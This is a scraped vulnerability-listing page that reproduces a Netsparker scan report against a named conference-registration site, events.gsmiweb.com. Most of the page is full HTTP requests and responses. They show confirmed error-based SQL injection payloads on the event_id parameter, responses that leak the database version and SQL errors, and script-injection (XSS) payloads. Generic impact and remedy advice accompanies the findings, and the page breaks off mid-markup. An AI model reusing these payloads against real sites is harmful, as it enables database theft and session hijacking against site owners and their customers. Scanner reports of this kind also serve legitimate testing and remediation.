XSS, Cross Site Scripting in events.gmsiweb.com, CWE-79, CAPEC-86, DORK, GHDB
Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search
XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading
Netsparker - Scan Report Summary
TARGET URL
https://events.gsmiweb.com/subscribe.php?even...
SCAN DATE
4/28/2011 9:01:30 AM
REPORT DATE
4/28/2011 9:25:33 AM
SCAN DURATION
00:00:49
13
identified
7
confirmed
4
critical
2
informational
GHDB DORK Tests
Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Blind SQL Injection, Boolean SQL Injection, HTTP Header Injection, SQL Injection, Cross-site Scripting
Authentication
Scheduled
GHDB, DORK VULNERABILITIES
Vulnerabilities
GHDB, DORK VULNERABILITY SUMMARY
Vulnerability Summary
SQL Injection
SQL Injection
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker
confirmed the vulnerability by executing a test SQL Query on the back-end database.
Impact
Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
Reading, Updating and Deleting arbitrary data from the database
Executing commands on the underlying operating system
Reading, Updating and Deleting arbitrary tables from the database
Actions to Take
See the remedy for solution.
If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping ). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
Locate all of the dynamically generated SQL queries and convert them to parameterised queries (If you decide to use a DAL/ORM, change all legacy code to use these new libraries )
Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.
A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements ). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation
There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.
External References
Remedy References
Parameters
Parameter
Type
Value
event_id
GET
(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
5.0.45-log
Request
GET /subscribe.php?event_id=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: events.gsmiweb.com Cookie: PHPSESSID=f6q3nruen2uq30q516cepkjdf7 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Thu, 28 Apr 2011 13:52:30 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 130 Connection: close Content-Type: text/html <script language="javascript"> window.location.href="events.php"; </script>Duplicate entry '_!@4dilemma:0' for key 1
Parameters
Parameter
Type
Value
event_id
GET
(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
accomodations
POST
3
address
POST
3
avail_balance
POST
3
balance_after_ct
POST
3
card_num
POST
3
cc_type
POST
Mastercard
city
POST
3
company
POST
3
conference
POST
3
conferenceval
POST
895.00,356
contact_fname
POST
Smith
contact_lname
POST
Smith
coupon
POST
3
coupon_amount
POST
3
department
POST
3
dietary
POST
3
discountamount
POST
0
discountcode
POST
3
email
POST
netsparker@example.com
event
POST
Cyber Security Summit
eventid
POST
82
exp_month
POST
1
exp_year
POST
11
fax
POST
3
first_name
POST
Smith
last_name
POST
Smith
leed_source
POST
3
pakdis
POST
3
payment_method
POST
cc
phone
POST
3
priceconfid
POST
0
priceworkshopid
POST
3
reset
POST
reset
response_code
POST
3
sessions0
POST
0
sessions1
POST
1
sessions2
POST
2
sessions3
POST
3
sncount
POST
4
state
POST
3
Status
POST
3
submit
POST
Submit
title
POST
3
total
POST
3
workshop
POST
3
workshop_alphabet
POST
3
workshop1
POST
295.00,358,A
workshop2
POST
295.00,360,C
workshopsession1
POST
1
workshopsession2
POST
2
zip
POST
3
5.0.45-log
Request
POST /subscribe.php?event_id=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1 Referer: https://events.gsmiweb.com/subscribe.php?event_id=82 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: events.gsmiweb.com Cookie: PHPSESSID=f6q3nruen2uq30q516cepkjdf7 Content-Length: 743 Accept-Encoding: gzip, deflate accomodations=3&address=3&avail_balance=3&balance_after_ct=3&card_num=3&cc_type=Mastercard&city=3&company=3&conference=3&conferenceval=895.00%2c356&contact_fname=Smith&contact_lname=Smith&coupon=3&coupon_amount=3&department=3&dietary=3&discountamount=0&discountcode=3&email=netsparker%40example.com&event=Cyber+Security+Summit&eventid=82&exp_month=1&exp_year=11&fax=3&first_name=Smith&last_name=Smith&leed_source=3&pakdis=3&payment_method=cc&phone=3&priceconfid=0&priceworkshopid=3&reset=reset&response_code=3&sessions0=0&sessions1=1&sessions2=2&sessions3=3&sncount=4&state=3&Status=3&submit=Submit&title=3&total=3&workshop=3&workshop_alphabet=3&workshop1=295.00%2c358%2cA&workshop2=295.00%2c360%2cC&workshopsession1=1&workshopsession2=2&zip=3
Response
HTTP/1.1 200 OK Date: Thu, 28 Apr 2011 13:52:36 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 130 Connection: close Content-Type: text/html <script language="javascript"> window.location.href="events.php"; </script>Duplicate entry '_!@4dilemma:0' for key 1
[Probable] SQL Injection
[Probable] SQL Injection
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it
could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.
Impact
Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
Reading, Updating and Deleting arbitrary data from the database
Executing commands on the underlying operating system
Reading, Updating and Deleting arbitrary tables from the database
Actions to Take
See the remedy for solution.
If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping ). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries )
Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.
A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements ). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation
There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.
External References
Remedy References
Parameters
Parameter
Type
Value
event_id
GET
%27
Request
GET /subscribe.php?event_id=%2527 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: events.gsmiweb.com Cookie: PHPSESSID=f6q3nruen2uq30q516cepkjdf7 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Thu, 28 Apr 2011 13:52:25 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 311 Connection: close Content-Type: text/html <script language="javascript"> window.location.href="events.php"; </script>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27 AND type = 1 AND active = 1 ORDER BY `order` ASC, price_id ASC' at line 3
Parameters
Parameter
Type
Value
event_id
GET
%27
accomodations
POST
3
address
POST
3
avail_balance
POST
3
balance_after_ct
POST
3
card_num
POST
3
cc_type
POST
Mastercard
city
POST
3
company
POST
3
conference
POST
3
conferenceval
POST
895.00,356
contact_fname
POST
Smith
contact_lname
POST
Smith
coupon
POST
3
coupon_amount
POST
3
department
POST
3
dietary
POST
3
discountamount
POST
0
discountcode
POST
3
email
POST
netsparker@example.com
event
POST
Cyber Security Summit
eventid
POST
82
exp_month
POST
1
exp_year
POST
11
fax
POST
3
first_name
POST
Smith
last_name
POST
Smith
leed_source
POST
3
pakdis
POST
3
payment_method
POST
cc
phone
POST
3
priceconfid
POST
0
priceworkshopid
POST
3
reset
POST
reset
response_code
POST
3
sessions0
POST
0
sessions1
POST
1
sessions2
POST
2
sessions3
POST
3
sncount
POST
4
state
POST
3
Status
POST
3
submit
POST
Submit
title
POST
3
total
POST
3
workshop
POST
3
workshop_alphabet
POST
3
workshop1
POST
295.00,358,A
workshop2
POST
295.00,360,C
workshopsession1
POST
1
workshopsession2
POST
2
zip
POST
3
Request
POST /subscribe.php?event_id=%2527 HTTP/1.1 Referer: https://events.gsmiweb.com/subscribe.php?event_id=82 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: events.gsmiweb.com Cookie: PHPSESSID=f6q3nruen2uq30q516cepkjdf7 Content-Length: 743 Accept-Encoding: gzip, deflate accomodations=3&address=3&avail_balance=3&balance_after_ct=3&card_num=3&cc_type=Mastercard&city=3&company=3&conference=3&conferenceval=895.00%2c356&contact_fname=Smith&contact_lname=Smith&coupon=3&coupon_amount=3&department=3&dietary=3&discountamount=0&discountcode=3&email=netsparker%40example.com&event=Cyber+Security+Summit&eventid=82&exp_month=1&exp_year=11&fax=3&first_name=Smith&last_name=Smith&leed_source=3&pakdis=3&payment_method=cc&phone=3&priceconfid=0&priceworkshopid=3&reset=reset&response_code=3&sessions0=0&sessions1=1&sessions2=2&sessions3=3&sncount=4&state=3&Status=3&submit=Submit&title=3&total=3&workshop=3&workshop_alphabet=3&workshop1=295.00%2c358%2cA&workshop2=295.00%2c360%2cC&workshopsession1=1&workshopsession2=2&zip=3
Response
HTTP/1.1 200 OK Date: Thu, 28 Apr 2011 13:52:25 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 311 Connection: close Content-Type: text/html <script language="javascript"> window.location.href="events.php"; </script>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27 AND type = 1 AND active = 1 ORDER BY `order` ASC, price_id ASC' at line 3
Cross-site Scripting
Cross-site Scripting
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (
Javascript, VbScript ) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
Hi-jacking users' active session
Changing the look of the page within the victims browser.
Mounting a successful phishing attack.
Intercept data and perform man-in-the-middle attacks.
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
External References
Parameters
Parameter
Type
Value
event_id
GET
'"--></style></script><script>alert(0x0001AC)</script>
accomodations
POST
3
address
POST
3
avail_balance
POST
3
balance_after_ct
POST
3
card_num
POST
3
cc_type
POST
Mastercard
city
POST
3
company
POST
3
conference
POST
3
conferenceval
POST
895.00,356
contact_fname
POST
Smith
contact_lname
POST
Smith
coupon
POST
3
coupon_amount
POST
3
department
POST
3
dietary
POST
3
discountamount
POST
0
discountcode
POST
3
email
POST
netsparker@example.com
event
POST
Cyber Security Summit
eventid
POST
82
exp_month
POST
1
exp_year
POST
11
fax
POST
3
first_name
POST
Smith
last_name
POST
Smith
leed_source
POST
3
pakdis
POST
3
payment_method
POST
cc
phone
POST
3
priceconfid
POST
0
priceworkshopid
POST
3
reset
POST
reset
response_code
POST
3
sessions0
POST
0
sessions1
POST
1
sessions2
POST
2
sessions3
POST
3
sncount
POST
4
state
POST
3
Status
POST
3
submit
POST
Submit
title
POST
3
total
POST
3
workshop
POST
3
workshop_alphabet
POST
3
workshop1
POST
295.00,358,A
workshop2
POST
295.00,360,C
workshopsession1
POST
1
workshopsession2
POST
2
zip
POST
3
Request
POST /subscribe.php?event_id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AC)%3C/script%3E HTTP/1.1 Referer: https://events.gsmiweb.com/subscribe.php?event_id=82 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: events.gsmiweb.com Cookie: PHPSESSID=f6q3nruen2uq30q516cepkjdf7 Content-Length: 743 Accept-Encoding: gzip, deflate accomodations=3&address=3&avail_balance=3&balance_after_ct=3&card_num=3&cc_type=Mastercard&city=3&company=3&conference=3&conferenceval=895.00%2c356&contact_fname=Smith&contact_lname=Smith&coupon=3&coupon_amount=3&department=3&dietary=3&discountamount=0&discountcode=3&email=netsparker%40example.com&event=Cyber+Security+Summit&eventid=82&exp_month=1&exp_year=11&fax=3&first_name=Smith&last_name=Smith&leed_source=3&pakdis=3&payment_method=cc&phone=3&priceconfid=0&priceworkshopid=3&reset=reset&response_code=3&sessions0=0&sessions1=1&sessions2=2&sessions3=3&sncount=4&state=3&Status=3&submit=Submit&title=3&total=3&workshop=3&workshop_alphabet=3&workshop1=295.00%2c358%2cA&workshop2=295.00%2c360%2cC&workshopsession1=1&workshopsession2=2&zip=3
Response
HTTP/1.1 200 OK Date: Thu, 28 Apr 2011 13:52:25 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 315 Connection: close Content-Type: text/html <script language="javascript"> window.location.href="events.php"; </script>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''"--></style></script><script>netsparker(0x0001AC)</script> AND type = 1 AN' at line 3
Parameters
Parameter
Type
Value
event_id
GET
'"--></style></script><script>alert(0x0001CA)</script>
Request
GET /subscribe.php?event_id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CA)%3C/script%3E HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: events.gsmiweb.com Cookie: PHPSESSID=f6q3nruen2uq30q516cepkjdf7 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Thu, 28 Apr 2011 13:52:48 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 315 Connection: close Content-Type: text/html <script language="javascript"> window.location.href="events.php"; </script>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''"--></style></script><script>netsparker(0x0001CA)</script> AND type = 1 AN' at line 3
Cookie Not Marked As Secure
Cookie Not Marked As Secure
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (
Man in the middle ) attack.
Impact
This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie ) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.
Actions to Take
See the remedy for solution.
Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure. ))
Mark all cookies used within the application as secure.
Required Skills for Successful Exploitation
To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to ) to a system between the victim and the web server.
PHPSESSID
Request
GET /subscribe.php?event_id=82 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: events.gsmiweb.com Accept-Encoding: gzip, deflate Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Thu, 28 Apr 2011 13:52:02 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=f6q3nruen2uq30q516cepkjdf7; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><link rel="stylesheet" href="css/default.advanced.css" type="text/css" media="screen" /><link rel="stylesheet" href="css/addoncss.css" type="text/css" media="screen" /><link rel="stylesheet" href="css/dropdown.css" type="text/css" media="screen" /><link rel="stylesheet" href="css/form.css" type="text/css" media="screen" /><link rel="stylesheet" href="css/gsmi_events.css" type="text/css" media="screen" /><title>Global Strategic Management Institute (GSMI) - Performance Management, Balanced Scorecard Training, Performance Management Conferences, Performance Management Training</title><META name="description" content="The Global Strategic Management Institute (GSMI) is the nation's premier provider of Performance Management education through business conferences, business event and business training.. We enable executive decision makers to better measure, manage and implement strategies to improve individual and organizational performance using tools like the Balanced Scorecard. GSMI research centers include: Leadership, Finance, Human Resources (HR) Business Analytics, Budgeting and Forecasting and Performance Management"><META name="keywords" content="gsmi, performance management, balanced scorecard, business conferences ,business events, business training, finance, leadership, process improvement, hr management, human resources, corporate performance management, business performance management, business analytics, corporate strategy, business strategy, organizational effectiveness, performance appraisals, human capital planning, operational performance"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><script src="includes/common.js"></script><script src="includes/ajaxgold.js"></script><script src="includes/number_format.js"></script><script language="JavaScript" src="https://secure.comodo.net/trustlogo/javascript/trustlogo.js" type="text/javascript"></script><script language="javascript">function calculate(){ var eventid=82; sncount = document.getElementById('sncount').value; var wcheckstatus='no'; var amt = 0; amount = 0; priamount = 0; woramount = 0; confamt = 0; priceid = 0; var workshop_alphabet = ''; priceworkshopid = ''; workshop_alphabet = ''; object = ''; disamount = ''; //for getting conference value if(isNaN(document.subscription_form.conferenceval.length)) { var brokenconf = (document.subscription_form.conferenceval.value).split(","); confamt = parseInt(brokenconf[0]); priamount = parseInt(priamount) + parseInt(confamt); priceid = brokenconf[1]; } else if(getRadioValue(document.subscription_form.conferenceval)) { var brokenconf = getRadioValue(document.subscription_form.conferenceval).split(","); confamt = parseInt(brokenconf[0]); priamount = parseInt(priamount) + parseInt(confamt); priceid = brokenconf[1]; } //for enabling and disabling the checkbox and option button var myarr = document.getElementsByName("workshop0"); var myarrofradio1 = document.getElementsByName("workshop1"); var myarrofradio2 = document.getElementsByName("workshop2"); var myarrofradio3 = document.getElementsByName("workshop3"); if (document.getElementById('wcheck')) { for(j=0;j<myarr.length;j++) { if(myarr[j].checked==true) { wcheckstatus='workshop0'; } } } if (document.getElementById('wradio')) { for(j=0;j<myarrofradio1.length;j++) { if(myarrofradio1[j].checked==true) { wcheckstatus='workshop'; } } for(j=0;j<myarrofradio2.length;j++) { if(myarrofradio2[j].checked==true) { wcheckstatus='workshop'; } } for(j=0;j<myarrofradio3.length;j++) { if(myarrofradio3[j].checked==true) { wcheckstatus='workshop'; } } } for(k=0; k<document.subscription_form.elements.length; k++) { if(wcheckstatus=='workshop0') { if(document.subscription_form.elements[k].id=="wradio") { document.subscription_form.elements[k].disabled=true; document.subscription_form.elements[k].checked=false; } } else if(wcheckstatus=='workshop') { if(document.subscription_form.elements[k].id=="wcheck") { document.subscription_form.elements[k].disabled=true; } } else { } } //for getting workshop value for(var i=0; i<sncount; i++) { object = eval("document.subscription_form.sessions" + i); //for checkbox in workshop if(i == 0) { if (document.getElementById('wcheck')) { for(var j=0; j<myarr.length; j++) { if(myarr[j].checked==true) { var chkbroken=myarr[j].value; var chkbrokenval = chkbroken.split(","); var chkamt = parseInt(chkbrokenval[0]); woramount = parseInt(woramount) + parseInt(chkamt); var chkid = chkbrokenval[1]; var chkalphabet = chkbrokenval[2]; workshop_alphabet = workshop_alphabet.concat(chkalphabet,';'); var sesname='workshopsession'+i; var sam=document.getElementById(sesname).value; priceworkshopid = priceworkshopid.concat(sam,';'); } } } } //for radio buttons in workshop else { var wshopname = "workshop"+i; var obje = document.getElementsByName(wshopname); if (obje) { var brokenstring = getRadioValue(obje).split(','); amt = parseInt(brokenstring[0]); if (!isNaN(amt)) { woramount = parseInt(woramount) + parseInt(amt); var sesname='workshopsession'+i; var sam=document.getElementById(sesname).value; priceworkshopid = priceworkshopid.concat(sam,';'); } var wid = parseInt(brokenstring[1]); var walphabet = brokenstring[2]; if (walphabet) { workshop_alphabet = workshop_alphabet.concat(walphabet,';'); } } } } priamount = number_format(priamount,2,'.',''); woramount = number_format(woramount,2,'.',''); amount = parseInt(priamount) + parseInt(woramount); $('amount').value = $('total').value = number_format(amount,2,'.',''); document.getElementById('priceworkshopid').value=priceworkshopid; document.getElementById('workshop_alphabet').value=workshop_alphabet; document.getElementById('workshop').value=woramount; document.getElementById('conference').value=parseInt(priamount); document.getElementById('priceconfid').value=priceid; postDataReturnText('apply-packagediscount.php','eventid='+eventid+'&total=' + $('total').value+'&priceid='+priceworkshopid,applypackageDiscount); }//for applying discounts automatically when the workshops are selectedfunction applypackageDiscount(text){ block($('package_msg')); arr = text.split('|'); if (!isNaN(arr[1])) { if(arr[2]!='') { $('package_msg').innerHTML = '<img src="images/accept.png" align="absmiddle" />'+arr[0]; document.getElementById('pakdis').value=arr[3]; } else { $('package_msg').innerHTML = ''; document.getElementById('pakdis').value=''; } $('amount').value = arr[1]; $('total').value = arr[1]; } postDataReturnText('apply-discount.php','coupon=' + $('coupon').value +'&total=' + $('total').value,applyDiscount);}//for applying the discount by entering its discount couponfunction applyDiscount(text){ var a_balance = 0; if($('avail_balance').value!='') a_balance = $('avail_balance').value; arr = text.split('|'); if (!isNaN(arr[0])) { if(arr[0]==0) { document.getElementById("cc").style.display='none'; } $('amount').value = arr[0]; $('coupon_msg').innerHTML = '<img src="images/accept.png" align="absmiddle" />'; document.getElementById('discountamount').value=arr[1]; document.getElementById('balance_after_ct').value=arr[2]; document.getElementById('discountcode').value=arr[4]; document.getElementById('coupon_amount').value=arr[3]; } else { $('coupon_msg').innerHTML = '<img src="images/cross.png" align="absmiddle" /> '+ arr[0]; $('coupon').value = ''; $('amount').value = arr[1]; }}function resetradiobutton(){for(k=0; k<document.subscription_form.elements.length; k++) { if(document.subscription_form.elements[k].id=="wradio" || document.subscription_form.elements[k].id=="wcheck" || document.subscription_form.elements[k].id=="conferenceval") { if(document.subscription_form.elements[k].disabled==true) document.subscription_form.elements[k].disabled=false; if(document.subscription_form.elements[k].checked==true) document.subscription_form.elements[k].checked=false; } } $('amount').value = $('total').value = ''; document.getElementById('priceconfid').value=''; document.getElementById('conference').value=''; document.getElementById('priceworkshopid').value=''; document.getElementById('workshop_alphabet').value=''; document.getElementById('workshop').value=''; $('coupon_msg').innerHTML=''; $('coupon').value = ''; $('package_msg').innerHTML=''; document.getElementById('pakdis').value=''; }function createinputbox(selectObject){ var ind = selectObject.options[selectObject.selectedIndex].value; if(ind=="Other") document.getElementById('sourceinput').innerHTML='<input type="text" id="other" name="other">'; else document.getElementById('sourceinput').innerHTML='';} </script><style type="text/css">#brighton_sub-menu{display:block;position:static;z-index:999;line-height:0;}#brighton_sub-menu ul{display:block;list-style-type:none;margin:0;padding:0;float:none;position:static;}#brighton_sub-menu ul li{display:block;margin:0;padding:0;font-size:12px;width:100%;position:static;line-height:16px;}#brighton_sub-menu ul li a{display:block;text-decoration:none;width:100%;}#brighton_sub-menu ul li a:hover{cursor:pointer;background:#f1f1f1;}#brighton_sub-menu ul li a span{display:block;padding:7px 15px 7px 14px;line-height:17px;}#brighton_sub-menu ul li.selectedtab{background:#f1f1f1;}#brighton_sub-menu ul li.selectedtab a{font-weight:bold;}#brighton_sub-menu ul li.first a span{}#brighton_sub-menu ul li.last{margin-bottom:25px;}#brighton_sub-menu ul li.separator{display:none;}#brighton_sub-menu ul li.haschildren{margin-bottom:0;}#brighton_sub-menu ul li.haschildren a span{}#brighton_sub-menu ul li.childitem1{background:#f1f1f1;margin-bottom:0;}#brighton_sub-menu ul li.childitem1 a span{margin-left:15px;}#brighton_sub-menu ul li.childitem1.last{padding-bottom:10px;}#brighton_sub-menu ul li.selectedpath{font-weight:normal;}/* fix to negate radmenu inherited style */#brighton_sub-menu div.radmenu{float:none;position:static;white-space:wrap;}#brighton_sub-menu div.radmenu ul.horizontal,#brighton_sub-menu div.radmenu ul.vertical{position:static;}#brighton_content div.radmenu ul.rootGroup{position:static;}#brighton_content div.radmenu ul.vertical{position:static;}.radmenu ul.horizontal,.radmenu ul.vertical,.radmenu .item{position:static;}#brighton_sub-menu .radmenu .item{position:static;}#brighton_sub-menu .radmenu .item a{position:static;}#brighton_sub-menu .radmenu .item a span{position:static;white-space:normal;}#brighton_sub-menu div.radmenu{float:none;position:static;white-space:wrap;}#brighton_sub-menu div.radmenu ul.horizontal,#brighton_sub-menu div.radmenu ul.vertical{position:static;}#brighton_content div.radmenu ul.rootGroup{position:static;}#brighton_content div.radmenu ul.vertical{position:static;}.radmenu ul.horizontal,.radmenu ul.vertical,.radmenu .item{position:static;}#brighton_sub-menu .radmenu .item{position:static;}#brighton_sub-menu .radmenu .item a{position:static;}#brighton_sub-menu .radmenu .item a span{position:static;white-space:normal;}#wrapper #left_main .right .eventtitle { font-size: 16px; font-weight: bold; color: #009BD4; text-decoration: underline;}#wrapper #left_main .right .fancy li { list-style-image: url(assets/templates/images/2010_bullet.png);}#wrapper #left_main .right .eventtitle a { font-size: 16px; font-weight: bold; color: #009BD4; text-decoration: underline;}</style><script language="javascript" type="text/javascript">//<![CDATA[var tl_loc0=(window.location.protocol == "https:")? "https://secure.comodo.net/trustlogo/javascript/trustlogo.js" :"http://www.trustlogo.com/trustlogo/javascript/trustlogo.js";document.writeln('<scr' + 'ipt language="JavaScript" src="'+tl_loc0+'" type="text\/javascript">' + '<\/scr' + 'ipt>');//]]></script></head><body> <div id="wrapper"><div id="header"><img src="https://events.gsmiweb.com/images/logo.gif" width="249" height="75" align="left" /><img src="https://events.gsmiweb.com/images/phone.gif" width="250" height="75" align="right" /></div><div id="navigation"><ul class="dropdown dropdown-horizontal"><li><a href="http://gsmiweb.com/" title="Home" Business Management Training>Home</a></li><li><a href="http://events.gsmiweb.com/events.php" title="Events" >Events</a></li><li class="active"><a href="http://gsmiweb.com/training.html" title="Training" >Training</a><ul><li><a href="/training/in-house-training.html" title="In-House Training" >In-House Training</a></li><li><a href="http://gsmiweb.com/training/balancedscorecard.html" title="Balanced Scorecard Training" >Balanced Scorecard Training</a></li><li class="last"><a href="http://gsmiweb.com/training/quality-assurance-masters.html" title="Quality Assurance Masters" >Quality Assurance Masters</a></li></ul></li><li><a href="http://gsmiweb.com/webinars.html" title="Online Webinars" >Webinars</a><ul><li><a href="http://grcwebconference.gsmiweb.com/" title="GRC Webinar" >GRC Webinar</a></li></ul></li><li><a href="http://blog.gsmiweb.com" title="Blog" 